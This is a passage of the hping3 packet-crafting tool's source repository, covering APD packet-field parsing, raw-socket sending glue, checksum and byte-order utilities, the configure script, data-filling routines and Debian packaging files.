pktlen = strlen(packet); 33 | char *x = alloca(layerlen+3); 34 | char *y = alloca(fieldlen+3); 35 | char *p, *j, *w; 36 | x[0] = '+'; 37 | memcpy(x+1, layer, layerlen); 38 | x[layerlen+1] = '('; 39 | x[layerlen+2] = '\0'; 40 | if (pktlen <= layerlen+1) 41 | return 0; 42 | if (memcmp(packet, x+1, layerlen+1) == 0) { 43 | p = packet; 44 | } else { 45 | p = strstr(packet, x); 46 | if (p == NULL) 47 | return 0; 48 | p++; 49 | } 50 | y[0] = ','; 51 | memcpy(y+1, field, fieldlen); 52 | y[fieldlen+1] = '='; 53 | y[fieldlen+2] = '\0'; 54 | p += layerlen + 1; 55 | pktlen -= p-packet; 56 | if (pktlen <= fieldlen+1) 57 | return 0; 58 | if ((j = strchr(p, ')')) == NULL) 59 | return 0; 60 | if (memcmp(p, y+1, fieldlen+1)) { 61 | p = strstr(p, y); 62 | if (p == NULL || p >= j) 63 | return 0; 64 | p++; 65 | } 66 | if (field_start) *field_start = p-packet; 67 | p += fieldlen + 1; 68 | if (value_start) *value_start = p-packet; 69 | w = strchr(p, ','); 70 | if (w && w < j) 71 | j = w; 72 | if (value_end) *value_end = (j-packet)-1; 73 | return 1; 74 | } 75 | 76 | /* This function extends ars_d_firstfield_off(), allowing to specify 77 | * how much layers of the same type of 'layer' to skip. This is 78 | * useful to get fields in packets where the same layer is present 79 | * more then one time. For example ICMP error packets contains 80 | * a quoted IP packet that can be accessed using a skip value of 1 81 | * (to skip the first IP layer). */ 82 | int ars_d_field_off(char *packet, char *layer, char *field, int skip, 83 | int *field_start, int *value_start, int *value_end) 84 | { 85 | char *p = packet; 86 | int end, toadd; 87 | 88 | /* Minimal overhead with a zero skip */ 89 | if (skip <= 0) 90 | return ars_d_firstfield_off(packet, layer, field, 91 | field_start, value_start, value_end); 92 | do { 93 | if (!ars_d_firstfield_off(p, layer, field, 94 | field_start, value_start, &end)) 95 | return 0; 96 | toadd = p-packet; 97 | p += end; 98 | } while(skip--); 99 | if (value_end) *value_end = end + toadd; 100 | if (field_start) *field_start += toadd; 101 | if (value_start) *value_start += toadd; 102 | return 1; 103 | } 104 | 105 | /* The function calls ars_d_field_off() in order to 106 | * return a dynamically allocated string containing 107 | * the value of the given field. On error (no match or out of mem) 108 | * NULL is returned. */ 109 | char *ars_d_field_get(char *packet, char *layer, char *field, int skip) 110 | { 111 | int start, end, len; 112 | char *x; 113 | 114 | if (!ars_d_field_off(packet, layer, field, skip, NULL, &start, &end)) 115 | return NULL; 116 | len = end-start+1; 117 | if ((x = malloc(len+1)) == NULL) 118 | return NULL; 119 | memcpy(x, packet+start, len); 120 | x[len] = '\0'; 121 | return x; 122 | } 123 | 124 | #ifdef TESTMAIN 125 | char packet[] = "ip(ihl=5,ver=4,tos=00,totlen=1340,id=43581,fragoff=0,mf=0,df=1,rf=0,ttl=4,proto=6,cksum=9029,saddr=192.168.1.6,daddr=195.14.221.49)+tcp(sport=55617,dport=80,seq=4048054653,ack=1246471424,x2=0,off=5,flags=pa,win=8576,cksum=6082,urp=0)+data(hex=0cd68e94650059b4dc81b1562d7288254c3faf5d651b75d1393abc6dcd5f5d1ad2f56b9bca9edc84b9212890b9407232b0d0e10222b4391e2e915c8ba4c0cb89c540d4c1389503c2d48b2c60a6c73500603cdba72144eccbd8f4cfc020af7d540fe99ea8fd0975371fb8f8167a0a1b94cf53e208cdce36dc2b692a857b958822ddac8d2cd1e8d9966a0361f345988084d558d8679f1393de4781ac8499178059f9f01d940cb2a8dfc288e500637c6a424ebde14068523291dc92bcec2e5eb4c8c53ad4192ff1e41e9e9e7cd5e389ef9dd3b9062d8509ac2f88a41863f009dfb3b08c041a68369561fa2bd9ffc09289d8719c2d52d6a687f3b837bbc51eb2a3aac50fafd2abf1a8374ca8cf6ab76a8a562e7e0995b43508a8a39abc6760738e4ef532b8968ef460719c2070eaa38fb67325e4f0903fe407b203a2d3d1bfb78dc0c430fbfc20029b0a2445801f9478beee2d964d95241edfa6322f34515b39ebbf2de43a3c533ba870ea8ef78b3baa70fb1d3491dcf931459395e92497205b633af5f426a921b79a28c5e1b86558f7b7e608c3cb0afa15dc8c60ad1897944074c712e141ae9ed44f3431c9e51ab6f92ab8248cc24279db669f6da1fecdf9ea299b24d94e7847545eab663e77e3a23fe133a8c7d18d23efbfa0a236586c315455ecae03c1d2e23bf713e9a240b26b83c5e5ead196581805ac6132f1454fb4c91a16d9cada46b1be728d697167d9b3c29cdcea3b04346116457bba715203bd45a3540d57a71368e9a015ae8d36368176752fdd93e975fd18e2797f53408aba273a20bad8f7f7763c20954e4aa371e0bbd4c03a9963a175fdd06457b3e39732e65d9443959adc1555e4bd59dcb7855bf204e31f04ad8ffb956e04a10896fdf861bd42408e10f47d38cffb3c9719bcff739265e3591bf5a2beedd9c90dc8a72c2dee5dc896914dee4c48f43c977736e4112255e4cd10d7812693b99f4484aa70d632f7ae94ce0bda674df8775fd017e40baae817de058b4563cba5539c5d4d580a754a3a042e49a6e56c7ce889388a606fde17ee8e25fa1c30abdd924564a3c03e5d2b7f265f4d030060b5d24da79c32a518c3febc3d8c2386298bfebbaee444be0252ac5ec5c93a212d4ebc0dd8e227629eb28161bb9037e6df3c02191a4a7b7c0c4187c99b99801399dbf325fcff261a97638c39656f32d292c3527004f7c00d1b51131d5d997a6a9934885ca44b4d856bddcb12b80f9484b3a5885e0c79e63ec1374efece0f7140df35c949dcaa49af4165d754dd1ff6d7747864ebfe1aac0d3979923e2cffc0ea2da693b10c2c794957161f382811d0196d69ab9b3b8c5edc8338f17632470f50ec34ceaecf4c6e30e6131db340a51f7113b614993f22b582bb47f8caffd8bca5aff325443a55fe16f2f57d8cdf86cd131062672b48122bdaabd844abf20ccfd8d82069c2120e706a4894709758fcd35c6e57a6fb64d6c03d14ef4ac5ba6347cc92b6d899cd6cdbf9e8be573eff7550dbb453cb5ac1fa9900ce73cd57cdc3b95aaad0d293a9c7e4a5054f8a46c9052d44f0d4b3fc5f6670a9c318f44d429f35ca4c1ce1b6d39daf02fa05c8decc46889a6fcf0f4491e563cbde158dc046f52cd328ac40c9c26629f6f42de60f9c7d52fe131a16b04a37c4967794ee4aa76c28463e8ca393abd6ca7aa41a9155db94a7d14f7a5f6ebaa2ee6751f0b139b403d524f433c939c382001fc1c6e9be709b55fcf01b01996889529917fabae23310a54878ca94601cf3182e9a5b01eabb588ff953c91205c56b54a2e125aa9c1c9753e5515566d027a827e55e1a6863cc82)+ip(ihl=5,ver=4,tos=10,totlen=1340,id=43581,fragoff=0,mf=0,df=1,rf=0,ttl=4,proto=6,cksum=9029,saddr=192.168.1.6,daddr=195.14.221.49)+tcp(sport=55617,dport=80,seq=4048054653,ack=1246471424,x2=0,off=5,flags=pa,win=8576,cksum=6082,urp=0)+ip(ihl=5,ver=4,tos=20,totlen=1340,id=43581,fragoff=0,mf=0,df=1,rf=0,ttl=4,proto=6,cksum=9029,saddr=192.168.1.6,daddr=195.14.221.49)"; 126 | 127 | int main(int argc, char **argv) 128 | { 129 | int i = 10000; 130 | int field_start, value_start, value_end; 131 | int skip; 132 | 133 | if (argc != 4) 134 | exit(1); 135 | skip = atoi(argv[3]); 136 | if (ars_d_field_off(packet, argv[1], argv[2], skip, 137 | &field_start, &value_start, &value_end)) 138 | { 139 | int j; 140 | printf("|"); 141 | for (j = field_start; j <= value_end; j++) { 142 | printf("%c", packet[j]); 143 | } 144 | printf("|\n"); 145 | } 146 | while(i--) { 147 | ars_d_field_off(packet, argv[1], argv[2], skip, 148 | NULL, NULL, NULL); 149 | } 150 | return 0; 151 | } 152 | #endif 153 | -------------------------------------------------------------------------------- /apdutils.h: -------------------------------------------------------------------------------- 1 | #ifndef __APD_UTILS_H 2 | #define __APD_UTILS_H 3 | 4 | int ars_d_firstfield_off(char *packet, char *layer, char *field, 5 | int *field_start, int *value_start, int *value_end); 6 | int ars_d_field_off(char *packet, char *layer, char *field, int skip, 7 | int *field_start, int *value_start, int *value_end); 8 | char *ars_d_field_get(char *packet, char *layer, char *field, int skip); 9 | 10 | #endif 11 | -------------------------------------------------------------------------------- /arsglue.c: -------------------------------------------------------------------------------- 1 | /* Glue between hping and the ars engine */ 2 | 3 | /* $Id: arsglue.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 4 | 5 | #include 6 | #include 7 | #include "ars.h" 8 | 9 | /* Send the APD described packet {s} */ 10 | void hping_ars_send(char *apd) 11 | { 12 | struct ars_packet p; 13 | int s; 14 | 15 | ars_init(&p); 16 | s = ars_open_rawsocket(&p); 17 | if (s == -ARS_ERROR) { 18 | perror("Opening raw socket"); 19 | exit(1); 20 | } 21 | if (ars_d_build(&p, apd) != -ARS_OK) { 22 | fprintf(stderr, "APD error: %s\n", p.p_error); 23 | exit(1); 24 | } 25 | if (ars_compile(&p) != -ARS_OK) { 26 | fprintf(stderr, "APD error compiling: %s\n", p.p_error); 27 | exit(1); 28 | } 29 | if (ars_send(s, &p, NULL, 0) != -ARS_OK) { 30 | perror("Sending the packet"); 31 | exit(1); 32 | } 33 | exit(0); 34 | } 35 | -------------------------------------------------------------------------------- /binding.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: binding.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:46 MET 1999$ 8 | * $rev: 11$ 9 | */ 10 | 11 | /* $Id: binding.c,v 1.2 2003/09/01 00:15:22 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | 18 | #include "hping2.h" 19 | #include "globals.h" 20 | 21 | void inc_destparm(int sid) 22 | { 23 | static long sec = 0; 24 | static long usec = 0; 25 | int *p; 26 | int errno_save = errno; 27 | 28 | switch (ctrlzbind) { 29 | case BIND_DPORT: 30 | p = &dst_port; 31 | break; 32 | case BIND_TTL: 33 | p = &src_ttl; 34 | break; 35 | default: 36 | printf("error binding ctrl+z\n"); 37 | /* errno = errno_save; */ 38 | return; 39 | } 40 | 41 | if ( (time(NULL) == sec) && ((get_usec() - usec) < 200000) ) { 42 | if (*p > 0) 43 | (*p)-=2; 44 | if (*p < 0) 45 | *p=0; 46 | } else 47 | (*p)++; 48 | 49 | printf("\b\b\b\b\b\b\b\b\b"); 50 | printf("%d: ", *p); 51 | fflush(stdout); 52 | 53 | sec = time(NULL); 54 | usec = get_usec(); 55 | signal(SIGTSTP, inc_destparm); 56 | errno = errno_save; 57 | } 58 | -------------------------------------------------------------------------------- /byteorder.c: -------------------------------------------------------------------------------- 1 | #if 0 2 | # 3 | # Compile with: 4 | # $sh byteorder.c 5 | # 6 | cc byteorder.c -o byteorder || exit 1 7 | echo successfully compiled 8 | exit 9 | #endif /* 0 */ 10 | 11 | /* Coypright (C) 1999-2003 Salvatore Sanfilippo */ 12 | 13 | /* 14 | * 0.1 first version 15 | * 0.2 add Strchr, so it's possibile remove string.h 16 | * 0.3 more portable thx to Pancrazio De Mauro 'TrantIT'!!! 17 | * 0.4 better debug output 18 | */ 19 | 20 | /* $Id: byteorder.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 21 | 22 | #include 23 | 24 | char *Strchr(char *s, char c) 25 | { 26 | while(*s) 27 | if (*s++ == c) 28 | return s; 29 | 30 | return (char*) 0; 31 | } 32 | 33 | int main(int argc, char **argv) 34 | { 35 | unsigned int test = 1; 36 | unsigned char *x; 37 | int macro = 0, debug = 0, help = 0, j; 38 | 39 | for (j = 1; j < argc; j++) { 40 | if (Strchr(argv[j], 'm')) macro = 1; 41 | if (Strchr(argv[j], 'd')) debug = 1; 42 | if (Strchr(argv[j], 'h')) help = 1; 43 | } 44 | 45 | if (help) { 46 | printf( "-m macro output\n" 47 | "-d debug\n" 48 | "-h help\n"); 49 | return 0; 50 | } 51 | 52 | x = (unsigned char*) &test; 53 | 54 | if (*x == 0x00) { 55 | if (macro) 56 | printf("__BIG_ENDIAN_BITFIELD\n"); 57 | else 58 | printf("big endian\n"); 59 | } 60 | else if (*x == 0x01) { 61 | if (macro) 62 | printf("__LITTLE_ENDIAN_BITFIELD\n"); 63 | else 64 | printf("little endian\n"); 65 | } else { 66 | printf("\nWARNING!!! byteorder exception\n\n"); 67 | debug = 1; 68 | } 69 | 70 | if (debug) { 71 | printf("sizeof(unsigned int) = %d\n", sizeof(unsigned int)); 72 | printf("unsigned int test = 1;\n"); 73 | printf("in memory as: "); 74 | for (j = 0; j < sizeof(unsigned int); j++) 75 | printf("%02x ", x[j]); 76 | printf("\n"); 77 | } 78 | return 0; 79 | } 80 | -------------------------------------------------------------------------------- /bytesex.h: -------------------------------------------------------------------------------- 1 | /* Original code from the Linux C library */ 2 | /* Copyright (C) 2000,2001 Salvatore Sanfilippo 3 | * This code is under the original GNU C library license (GPL) */ 4 | 5 | /* $Id: bytesex.h,v 1.1.1.1 2003/08/31 17:23:48 antirez Exp $ */ 6 | 7 | #ifndef ARS_BYTESEX_H 8 | #define ARS_BYTESEX_H 9 | 10 | #if defined(__i386__) \ 11 | || defined(__alpha__) \ 12 | || (defined(__mips__) && (defined(MIPSEL) || defined (__MIPSEL__))) 13 | #define BYTE_ORDER_LITTLE_ENDIAN 14 | #elif defined(__mc68000__) \ 15 | || defined (__sparc__) \ 16 | || defined (__sparc) \ 17 | || defined (__PPC__) \ 18 | || defined (__BIG_ENDIAN__) \ 19 | || (defined(__mips__) && (defined(MIPSEB) || defined (__MIPSEB__))) 20 | #define BYTE_ORDER_BIG_ENDIAN 21 | #else 22 | # error can not find the byte order for this architecture, fix bytesex.h 23 | #endif 24 | 25 | #endif /* ARS_BYTESEX_H */ 26 | -------------------------------------------------------------------------------- /cksum.c: -------------------------------------------------------------------------------- 1 | /* $Id: cksum.c,v 1.3 2004/04/14 12:30:18 antirez Exp $ */ 2 | 3 | #include "hping2.h" /* only for arch semi-indipendent data types */ 4 | #include "globals.h" 5 | 6 | /* 7 | * from R. Stevens's Network Programming 8 | */ 9 | __u16 cksum(__u16 *buf, int nbytes) 10 | { 11 | __u32 sum; 12 | __u16 oddbyte; 13 | 14 | sum = 0; 15 | while (nbytes > 1) { 16 | sum += *buf++; 17 | nbytes -= 2; 18 | } 19 | 20 | if (nbytes == 1) { 21 | oddbyte = 0; 22 | *((__u16 *) &oddbyte) = *(__u16 *) buf; 23 | sum += oddbyte; 24 | } 25 | 26 | sum = (sum >> 16) + (sum & 0xffff); 27 | sum += (sum >> 16); 28 | 29 | /* return a bad checksum with --badcksum option */ 30 | if (opt_badcksum) sum ^= 0x5555; 31 | 32 | return (__u16) ~sum; 33 | } 34 | -------------------------------------------------------------------------------- /configure: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | show_help() 4 | { 5 | echo configure help: 6 | echo "--help show this help" 7 | echo "--no-tcl disable TCL scripting support" 8 | echo " even if uid != euid" 9 | } 10 | 11 | if [ "$1" = "--help" ]; then 12 | show_help 13 | exit 0 14 | fi 15 | 16 | CC=${CC:=cc} 17 | 18 | echo build byteorder.c... 19 | $CC byteorder.c -o byteorder || exit 1 20 | 21 | INSTALL_MANPATH=`echo $MANPATH|cut -f1 -d:` 22 | if [ "$INSTALL_MANPATH" = "" ]; then 23 | INSTALL_MANPATH="/usr/local/man" 24 | fi 25 | BYTEORDER=`./byteorder -m` 26 | 27 | echo create byteorder.h... 28 | cat > byteorder.h <> byteorder.h 34 | echo \#define $BYTEORDER >> byteorder.h 35 | echo \#endif /\* $BYTEORDER \*/ >> byteorder.h 36 | cat >> byteorder.h < Found Tclsh in: $TCLSH" 75 | fi 76 | fi 77 | done 78 | done 79 | if [ -f $TCLSH ] 80 | then 81 | TCL_VER=`echo puts \\$tcl_version | $TCLSH -` 82 | USE_TCL='-DUSE_TCL' 83 | TCL_LIB="-ltcl${TCL_VER}" 84 | if [ -e /usr/include/tcl${TCL_VER} ] 85 | then 86 | TCL_INC="-I/usr/include/tcl${TCL_VER}" 87 | elif [ -e /usr/include/tcl.h ] 88 | then 89 | TCL_INC="" 90 | elif [ -e /usr/local/include/tcl${TCL_VER} ] 91 | then 92 | TCL_INC="-I/usr/local/include/tcl${TCL_VER}" 93 | else 94 | USE_TCL="" 95 | TCL_LIB="" 96 | echo "==> WARNING: no Tcl header files found!" 97 | fi 98 | fi 99 | if [ -n $USE_TCL ] 100 | then 101 | LIBPOSTFIX=`ls -1 /usr/local/lib/ /usr/lib | grep 'libtcl[0-9]' | grep so | sed -e 's/\.so.*//g' -e 's/libtcl//g' | sort -r | head -1` 102 | TCL_LIB="-ltcl${LIBPOSTFIX} -lm -lpthread" 103 | fi 104 | 105 | # 106 | # configurable stuff 107 | # 108 | PCAP="PCAP=-lpcap" 109 | PCAP_INCLUDE="" 110 | 111 | for ARG in $*; do 112 | case "$ARG" in 113 | *"--no-tcl") 114 | USE_TCL="" 115 | TCL_VER="" 116 | TCL_INC="" 117 | TCL_LIB="" 118 | ;; 119 | esac 120 | done 121 | 122 | echo -------------------------------------- 123 | echo system type: $CONFIGOSTYPE 124 | echo 125 | echo "LIBPCAP : $PCAP" 126 | echo "PCAP_INCLUDE : $PCAP_INCLUDE" 127 | echo "MANPATH : $INSTALL_MANPATH" 128 | echo "USE_TCL : $USE_TCL" 129 | echo "TCL_VER : $TCL_VER" 130 | echo "TCL_INC : $TCL_INC" 131 | echo "LIBTCL : $TCL_LIB" 132 | echo "TCLSH : $TCLSH" 133 | echo 134 | echo "(to modify try configure --help)" 135 | echo -------------------------------------- 136 | 137 | echo creating Makefile... 138 | sed -e "s^@PCAP@^$PCAP^g" \ 139 | -e "s^@PCAP_INCLUDE@^$PCAP_INCLUDE^g" \ 140 | -e "s^@MANPATH@^$INSTALL_MANPATH^g" \ 141 | -e "s^@SOLARISLIB@^$SOLARISLIB^g" \ 142 | -e "s^@USE_TCL@^$USE_TCL^g" \ 143 | -e "s^@TCL_INC@^$TCL_INC^g" \ 144 | -e "s^@TCL_VER@^$TCL_VER^g" \ 145 | -e "s^@TCL_LIB@^$TCL_LIB^g" \ 146 | Makefile 147 | 148 | # 149 | # 150 | # 151 | 152 | cat > systype.h <> systype.h 158 | cat >> systype.h < .depend 165 | 166 | echo now you can try \`make\' 167 | -------------------------------------------------------------------------------- /datafiller.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: datafiller.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:47 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: datafiller.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include /* memset */ 20 | 21 | #include "hping2.h" 22 | #include "globals.h" 23 | 24 | void datafiller(char *p, int size) 25 | { 26 | static int fd = 0; 27 | int readed, diff; 28 | 29 | if (!fd) { 30 | fd = open(datafilename, O_RDONLY); 31 | if (fd == -1) { 32 | perror("[datafiller] open()"); 33 | fd = 0; /* will retry to open the file for 34 | * the next packet */ 35 | memset(p, 'X', size); 36 | return; 37 | } 38 | } 39 | 40 | if (p == NULL && fd != -1) { /* seek operation */ 41 | /* size-1 because packet with id 1 start from 0 */ 42 | lseek(fd, (data_size-signlen)*(size-1), SEEK_SET); 43 | return; 44 | } 45 | 46 | restart: /* if EOF occurs, after rewind, restart */ 47 | 48 | readed = read(fd, p, size); 49 | if (readed == size) 50 | return; 51 | else if (readed == -1) { 52 | perror("[datafiller] read()"); 53 | close(fd); 54 | fd = 0; /* will retry to open the file for the next packet */ 55 | memset(p, 'X', size); 56 | return; 57 | } 58 | else if (readed < size && opt_end == FALSE) { 59 | lseek(fd, 0, SEEK_SET); 60 | if (readed == 0) 61 | goto restart; 62 | } 63 | else if (readed < size && opt_end == TRUE) { 64 | fprintf(stderr, "EOF reached, wait some second than press " 65 | "ctrl+c\n"); 66 | eof_reached = TRUE; 67 | } else { 68 | printf("[datafiller.c INTERNAL ERROR] readed = %d - " 69 | "opt_end == %d\n", readed, opt_end); 70 | exit(1); 71 | } 72 | diff = size - readed; 73 | memset(p+readed, '\0', diff); /* padding */ 74 | lseek(fd, 0, SEEK_SET); 75 | return; 76 | } 77 | -------------------------------------------------------------------------------- /datahandler.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $smu-mark$ 3 | * $name: datahandler.c$ 4 | * $author: Salvatore Sanfilippo $ 5 | * $copyright: Copyright (C) 1999 by Salvatore Sanfilippo$ 6 | * $license: This software is under GPL version 2 of license$ 7 | * $date: Fri Nov 5 11:55:47 MET 1999$ 8 | * $rev: 8$ 9 | */ 10 | 11 | /* $Id: datahandler.c,v 1.2 2003/09/01 00:22:06 antirez Exp $ */ 12 | 13 | #include 14 | 15 | #include "hping2.h" 16 | #include "globals.h" 17 | 18 | void data_handler(char *data, int data_size) 19 | { 20 | if (opt_listenmode) { /* send an HCMP */ 21 | memcpy(data, rsign, signlen); /* ok, write own reverse sign */ 22 | data+=signlen; 23 | data_size-=signlen; 24 | memcpy(data, hcmphdr_p, data_size); 25 | return; /* done */ 26 | } 27 | 28 | if (opt_sign) { 29 | memcpy(data, sign, signlen); /* lenght pre-checked */ 30 | data+=signlen; 31 | data_size-=signlen; 32 | } 33 | 34 | if (data_size == 0) 35 | return; /* there is not space left */ 36 | 37 | if (opt_datafromfile) 38 | datafiller(data, data_size); 39 | else 40 | memset(data, 'X', data_size); 41 | } 42 | -------------------------------------------------------------------------------- /debian/README.source: -------------------------------------------------------------------------------- 1 | This package uses quilt to manage all modifications to the upstream 2 | source. Changes are stored in the source package as diffs in 3 | debian/patches and applied during the build. 4 | 5 | To get the fully patched source after unpacking the source package, cd to 6 | the root level of the source package and run: 7 | 8 | quilt push -a 9 | 10 | The last patch listed in debian/patches/series will become the current 11 | patch. 12 | 13 | To add a new set of changes, first run quilt push -a, and then run: 14 | 15 | quilt new 16 | 17 | where is a descriptive name for the patch, used as the filename in 18 | debian/patches. Then, for every file that will be modified by this patch, 19 | run: 20 | 21 | quilt add 22 | 23 | before editing those files. You must tell quilt with quilt add what files 24 | will be part of the patch before making changes or quilt will not work 25 | properly. After editing the files, run: 26 | 27 | quilt refresh 28 | 29 | to save the results as a patch. 30 | 31 | Alternately, if you already have an external patch and you just want to 32 | add it to the build system, run quilt push -a and then: 33 | 34 | quilt import -P /path/to/patch 35 | quilt push -a 36 | 37 | (add -p 0 to quilt import if needed). as above is the filename to 38 | use in debian/patches. The last quilt push -a will apply the patch to 39 | make sure it works properly. 40 | 41 | To remove an existing patch from the list of patches that will be applied, 42 | run: 43 | 44 | quilt delete 45 | 46 | You may need to run quilt pop -a to unapply patches first before running 47 | this command. 48 | -------------------------------------------------------------------------------- /debian/changelog: -------------------------------------------------------------------------------- 1 | hping3 (3.a2.ds2-6.1) unstable; urgency=low 2 | 3 | * Non-maintainer upload. 4 | * debian/control: Replace the obsolete tcl8.4-dev package by tcl-dev in 5 | build dependencies (Closes: #725324). 6 | 7 | -- Sergei Golovan Thu, 31 Oct 2013 12:42:30 +0400 8 | 9 | hping3 (3.a2.ds2-6) unstable; urgency=low 10 | 11 | * debian/patches/140_data_size_udp.diff: Fix incorrect data size 12 | check for UDP (Closes: #546590), thanks to Luca Bigliardi. 13 | * debian/patches/150_gnu_kfreebsd.diff: Fix FTBFS for kfreebsd-{i386,amd64}. 14 | * debian/patches/160_tcp_mss.diff: Add support to TCP MSS from NetBSD: 15 | patch-aa, patch-ai, patch-aj, patch-ak, patch-al, patch-am, patch-an 16 | (Closes: #409391). 17 | 18 | -- Guillaume Delacour Sat, 19 Sep 2009 12:35:34 +0000 19 | 20 | hping3 (3.a2.ds2-5) unstable; urgency=low 21 | 22 | * debian/patches/080_ip_id_field.diff: Add description to header. 23 | * debian/patches/090_fr_manpage.diff: 24 | + use hping2 fr manpage for hping3 (already included in source). 25 | * debian/patches/100_hyphen_used_as_minus_sign.diff 26 | + Add "\" to "-" in english and fr manpage (as suggested by lintian). 27 | * debian/patches/110_dontfrag_offbyone.diff: 28 | Don't clear packet size if final size equivalent to MTU 29 | (Closes: #537704), thanks to Christian Mock. 30 | * debian/patches/120_rtt_icmp_unreachable.diff: 31 | Add RTT handling for ICMP destination unreachable packets 32 | (Closes: #248273), thanks to Baruch Even. 33 | * debian/patches 34 | * debian/watch: 35 | + Add empty but documented file (to explain why). 36 | * Bump to debhelper compatibility 7. 37 | * Bump Standards-Version to 3.8.3, no changes needed. 38 | * debian/control: change the git repo location. 39 | * debian/compat: Bump to 7 (replace dh_clean -k by dh_prep in install rule) 40 | * debian/copyright: Adjust licences on BSD style sources. 41 | 42 | -- Guillaume Delacour Fri, 04 Sep 2009 23:48:19 +0000 43 | 44 | hping3 (3.a2.ds2-4) unstable; urgency=low 45 | 46 | * New maintainer (Closes: #522830) 47 | * debian/control: 48 | + Bump Standards-Version to 3.8.1, no changes needed. 49 | * debian/copyright: 50 | + /usr/share/common-licenses -> /usr/share/common-licenses/GPL-2 51 | + Change download url (previous http://wiki.hping.org/101 returns 404) 52 | * debian/patches/80_ip_id_field.diff: 53 | + Include patch to fix "-N" command line argument (Closes: #482844). 54 | 55 | -- Guillaume Delacour Wed, 13 May 2009 16:39:41 +0000 56 | 57 | hping3 (3.a2.ds2-3) unstable; urgency=low 58 | 59 | * debian/control: Set maintainer to Debian QA group. 60 | 61 | -- Romain Francoise Mon, 06 Apr 2009 21:53:32 +0200 62 | 63 | hping3 (3.a2.ds2-2) unstable; urgency=low 64 | 65 | * debian/control: 66 | + Use "Tcl", not "TCL" in long description. 67 | + Bump Standards-Version to 3.7.3, no changes needed. 68 | * debian/patches/70_tcl.diff: New patch, change libtcl detection logic 69 | to use the same version as the default tclsh instead of looking for 70 | the newest installed library. 71 | * debian/patches/series: Update. 72 | 73 | -- Romain Francoise Sat, 08 Mar 2008 19:44:14 +0100 74 | 75 | hping3 (3.a2.ds2-1) unstable; urgency=low 76 | 77 | * debian/control: Add Vcs-Git and Vcs-Browser fields. 78 | 79 | -- Romain Francoise Mon, 08 Oct 2007 22:38:26 +0200 80 | 81 | hping3 (3.a2.ds1-5) unstable; urgency=low 82 | 83 | * debian/control: Move upstream URL to the Homepage field. 84 | 85 | -- Romain Francoise Fri, 28 Sep 2007 21:25:40 +0200 86 | 87 | hping3 (3.a2.ds1-4) unstable; urgency=low 88 | 89 | * Convert to quilt for patch management: 90 | + debian/control: Build-Depend on quilt (>= 0.40) instead of dpatch. 91 | + debian/rules: Include /usr/share/quilt/quilt.make. 92 | + Convert all dpatch patches to regular patches. 93 | 94 | * debian/control: Bump Standards-Version to 3.7.2, no changes needed. 95 | * debian/rules: Don't ignore errors from make distclean. 96 | 97 | -- Romain Francoise Thu, 30 Aug 2007 22:12:04 +0200 98 | 99 | hping3 (3.a2.ds1-3) unstable; urgency=low 100 | 101 | * debian/control: 102 | + Add extra space before the Homepage pseudo-header (closes: #365483). 103 | + Bump Standards-Version to 3.7.0, no changes needed. 104 | 105 | -- Romain Francoise Mon, 1 May 2006 19:52:39 +0200 106 | 107 | hping3 (3.a2.ds1-2) unstable; urgency=low 108 | 109 | * debian/copyright: Update FSF's address. 110 | * debian/compat: Switch to compatibility level 5. 111 | * debian/control: 112 | + Bump Standards-Version to 3.6.2.1, no changes needed. 113 | + Build-Depend on debhelper (>= 5.0.0). 114 | 115 | -- Romain Francoise Sun, 18 Dec 2005 15:14:11 +0100 116 | 117 | hping3 (3.a2.ds1-1) unstable; urgency=low 118 | 119 | * New maintainer. 120 | * Repackaged as 3.a2.ds1 to remove non-free RFC texts. 121 | * debian/control: 122 | + Build-Depend on libpcap0.8-dev, dpatch (>= 2.0.9). 123 | + Change priority to extra. 124 | + Slightly reword long description. 125 | + Update maintainer contact info. 126 | * debian/copyright: Update maintainer contact info. 127 | * debian/rules: 128 | + Fix dpatch integration. 129 | + Ship hping3 TCL scripts as examples (and forcibly leave them 130 | uncompressed). 131 | + Various cleanups. 132 | * debian/patches/10_install.dpatch: New patch based on previous 133 | "Makefilein.dpatch". 134 | * debian/patches/20_libpcap0.8.dpatch: New patch for libpcap0.8 135 | compilation. 136 | * debian/patches/30_bytesex.dpatch: New patch stolen from my hping2 137 | package to make bytesex.h use endian.h instead of hardcoding byte 138 | orders; many thanks to Peter De Schrijver who provided a similar patch 139 | (closes: #283038). 140 | * debian/patches/40_spelling.dpatch: New patch stolen from my hping2 141 | package to fix various spelling errors in hping. 142 | * debian/patches/50_personality.dpatch: New patch, change all 143 | occurrences of "hping2" to "hping3" in help messages and in the man 144 | page. Also say "hping3" instead of "hping" since the latter is really 145 | hping2 in Debian. 146 | * debian/patches/60_version.dpatch: New patch, this is really version 147 | alpha-2 so fix release.h accordingly. 148 | * debian/patches/00list: New file. 149 | 150 | -- Romain Francoise Sat, 12 Mar 2005 14:15:32 +0100 151 | 152 | hping3 (3.a2-1) unstable; urgency=low 153 | 154 | * Initial Release. (Closes: #267153) 155 | 156 | -- Vincent Tantardini Sun, 10 Oct 2004 20:24:03 +0200 157 | 158 | -------------------------------------------------------------------------------- /debian/compat: -------------------------------------------------------------------------------- 1 | 7 2 | -------------------------------------------------------------------------------- /debian/control: -------------------------------------------------------------------------------- 1 | Source: hping3 2 | Section: net 3 | Priority: extra 4 | Maintainer: Guillaume Delacour 5 | Build-Depends: debhelper (>= 7), libpcap0.8-dev, tcl-dev, quilt (>= 0.40) 6 | Standards-Version: 3.8.3 7 | Homepage: http://www.hping.org/ 8 | Vcs-Browser: http://git.debian.org/?p=collab-maint/hping3.git 9 | Vcs-Git: 